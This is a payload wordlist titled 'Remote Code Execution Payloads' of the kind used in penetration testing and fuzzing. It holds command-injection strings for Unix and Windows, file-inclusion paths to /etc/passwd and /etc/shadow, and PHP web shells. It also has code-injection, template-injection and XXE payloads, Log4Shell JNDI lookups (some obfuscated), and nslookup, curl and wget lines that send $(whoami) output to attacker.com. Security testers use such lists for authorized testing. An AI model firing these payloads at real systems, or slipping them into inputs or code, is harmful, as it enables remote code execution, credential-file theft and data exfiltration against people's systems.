# Remote Code Execution Payloads
# Command injection - Unix/Linux
; whoami
| whoami
& whoami
&& whoami
|| whoami
`whoami`
$(whoami)
${whoami}
; id
| id
& id
&& id
|| id
`id`
$(id)
${id}

# Command injection - Windows
; dir
| dir
& dir
&& dir
|| dir
`dir`
$(dir)
; ipconfig
| ipconfig
& ipconfig
&& ipconfig
|| ipconfig

# File inclusion - Local
../../../etc/passwd
..\..\..\windows\system32\drivers\etc\hosts
....//....//....//etc/passwd
....\\....\\....\\windows\\system32\\drivers\\etc\\hosts
/etc/passwd
/etc/shadow
/etc/hosts
/proc/version
/proc/self/environ
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
C:\windows\win.ini

# File inclusion - Remote
http://attacker.com/shell.txt
https://attacker.com/shell.txt
ftp://attacker.com/shell.txt
//attacker.com/share/shell.txt

# PHP Code injection
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php eval($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
<? system($_GET['cmd']); ?>
<? echo `$_GET[cmd]`; ?>

# Python code injection
__import__('os').system('whoami')
exec("import os; os.system('whoami')")
eval("__import__('os').system('whoami')")

# JavaScript code injection (Node.js)
require('child_process').exec('whoami')
process.mainModule.require('child_process').exec('whoami')
global.process.mainModule.require('child_process').exec('whoami')

# Java code injection
Runtime.getRuntime().exec("whoami")
new ProcessBuilder("whoami").start()

# Template injection payloads
{{7*7}}
{{config.items()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
${7*7}
#{7*7}

# Server-Side Template Injection (SSTI)
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
${T(java.lang.Runtime).getRuntime().exec('whoami')}

# Expression Language injection
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(pageContext.request.getClass().forName("java.lang.Runtime")).exec("whoami"))}
#{1+1}

# Serialization attacks
O:8:"stdClass":1:{s:1:"a";s:6:"whoami";}
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABdAABYXQAAWJ4

# Log4j injection (Log4Shell)
${jndi:ldap://attacker.com/a}
${jndi:rmi://attacker.com/a}
${jndi:dns://attacker.com/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}

# XML External Entity (XXE)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/">]><root>&xxe;</root>

# Path traversal with execution
../../../bin/sh
..\..\..\windows\system32\cmd.exe

# Time-based detection
; sleep 10
| sleep 10
& sleep 10
&& sleep 10
|| sleep 10
`sleep 10`
$(sleep 10)
; ping -c 10 127.0.0.1
| ping -c 10 127.0.0.1

# Out-of-band data exfiltration
; nslookup $(whoami).attacker.com
| nslookup $(whoami).attacker.com
; curl http://attacker.com/$(whoami)
| curl http://attacker.com/$(whoami)
; wget http://attacker.com/$(whoami)
| wget http://attacker.com/$(whoami)

# Encoded payloads
%3B%20whoami
%7C%20whoami
%26%20whoami
%26%26%20whoami
%7C%7C%20whoami

# Double encoded
%253B%2520whoami
%257C%2520whoami
%2526%2520whoami

